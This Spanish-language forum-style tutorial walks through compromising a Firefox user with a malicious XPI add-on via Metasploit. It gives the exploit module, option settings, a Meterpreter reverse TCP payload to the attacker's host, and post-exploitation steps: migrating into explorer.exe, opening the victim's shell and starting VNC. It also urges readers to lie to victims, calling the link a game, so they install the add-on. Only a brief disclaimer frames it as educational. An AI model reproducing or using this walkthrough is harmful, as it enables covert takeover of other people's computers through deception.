Hola ahora les traigo un tutorial de como hacer un Reverse Shell a firefox construllendo un Complemento malicioso XPI y una ves logrado esto pondremos en marcha algunas funciones de meterpreter
Necesitas:
- Tener Instalado BackTrack Descargar aquí
- Conocimientos básicos de comandos en Terminal de linux
- Paciencia & Dedicación
Algo de Teoría:
BackTrack
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100 Network Security Tools" de 2006.
Metasploit
Metasploit Es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos.
Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota. Otros subproyectos importantes son la bases de datos de opcodes (códigos de operación), un archivo de shellcodes, e investigación sobre seguridad. Inicialmente fue creado utilizando el lenguaje de programación de scripting Perl, aunque actualmente el Metasploit Framework ha sido escrito de nuevo completamente en el lenguaje Ruby.
Metpreter
Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de información sobre un objetivo comprometido, así como también manipular procesos del sistema y/o terminarlos. Meterpreter es un interprete de comandos que permite de una forma segura y suave interactuar con la maquina objetivo ganando por una parte la flexibilidad de un stagers (ejecución de múltiples comandos en un payload) y por otra parte, la fiabilidad de que no será detectado fácilmente por un antivirus, firewall o IDS ya que se ejecuta como un proceso en el sistema operativo y no escribe ningún fichero al sistema remoto.
Tutorial
Primero lo que vamos a hacer es Prender nuestra Pc con BackTrack en mi caso lo tengo instalado en VBox
Una ves echo eso abrimos una terminal y ejecutamos msfconsole
Esperamos a que se ejecute y cuando termine nos va a mostrar una una figura en la terminal
NOTA: no te tiene que aparecer esta imagen, son varias te puede salir una diferente
Ejecutamos search xpi para que nos busque el exploit que vamos a utilizar.
Nos va a desplegar una lista de Exploit's y el que vamos a usar con el comando use es el segundo "exploit/multi/browser/firefox_xpi_bootstrapped_addon"
ya cuando se realizo la selección del exploit vamos a poner show options para ver las 3 opciones que tenemos que modificar.
SRVHOST - Es nuestro local Host osea la ip que tienes asignada para saber tu ip solo basta con poner un ifconfig
SRVPORT - Es el puerto por default te pone el 8080 lo cambiaremos al 80
URIPATH - Esto es lo que sigue de la ip por ejemplo 192.168.1.18/juegos el /juegos viene siendo nuestro uripath
para modificar estas tres opciones vamos a usar el comando set y enseguida el nombre de la opcion
Donde
SRVHOST en mi caso es 192.168.1.72
SRVPORT le puse el 80 como lo indique arriba
URIPATH le puse /JUEGO
para ver si se realizaron estos cambios volvemos a poner show options
vemos que se cambiaron con éxito
ahora lo que vamos a hacer es seleccionar el payload que vamos a utilizar con el comando set payload que va a ser windows/meterpreter/reverse_tcp
volvemos a poner show options y veremos mas abajo que se a seleccionado el payload y mas abajo vemos LHOST & LPOST
Donde
LHOST - es la ip que tenemos para saber tu ip solo basta con poner un ifconfig
LPORT el es puerto por el cual nos va a hacer la conexión pondremos el 443
Loas cambiaremos con el comando set
ponemos show options y veremos que se realizaron los cambios con éxito
ya no queda mas que lanzar el exploit con el comando exploit y esperar a que termine de ejecutarse
Si observamos lo que esta seleccionado es una especie de url que es la que le vamos a pasar a nuestra victima que cuente con mozilla firefox instalado ya es cuenta de ustedes pasar esa url a la victima lavenle el cerebro y miente que es un juego no se lo que se te ocurra ojo la victima tiene que estar conectada en tu red
Pc Victima
le pasas la url a tu victima le dices que la ponga en la barra de direcciones de firefox
y que le de permitir para que el complemento se instale
Pc Atacante
Vemos que ya hay actividad que se estan haciendo peticiones y esta esperando a que la victima le de en aceptar
Pc Victima
mientras tanto en la Pc victima el usuario acepta el complemento y lo instala
Pc Atacante
y así obtenemos una sesión
y para entrar a la sesión solo basta con poner sessions -i 1 donde 1 es el numero de la sesión
si pones un ? podrás ver algunas funciones de meterpreter
la que vamos a usar para poder entrar a la pc victima es la de ps y buscamos el proceso explorer.exe
ponemos migrate que es para migrar a ese proceso y el PID que en mi caso es el 292
si todo salio bien usaremos el comando shell que nos mostrara la terminal de windows de la victima
para salir solo basta con poner exit
para hacer un enlace vnc y conocer sus opciones es solo poner run vnc -h y nos mostrara las opciones
y para un enlace vnc run vnc -P 80
Donde
-P significa el numero de puerto
80 es el numero de puerto que puse al principio
NOTA: de esto no tengo imagen por que el antivirus no me dejo realizar esta conexion espero y a ustedes si les funcione Este tema es con fines educativos no me ago responsable por el mal uso que se le de Gracias !!!
Espero y les guste cualquier cosa me lo hacen saber


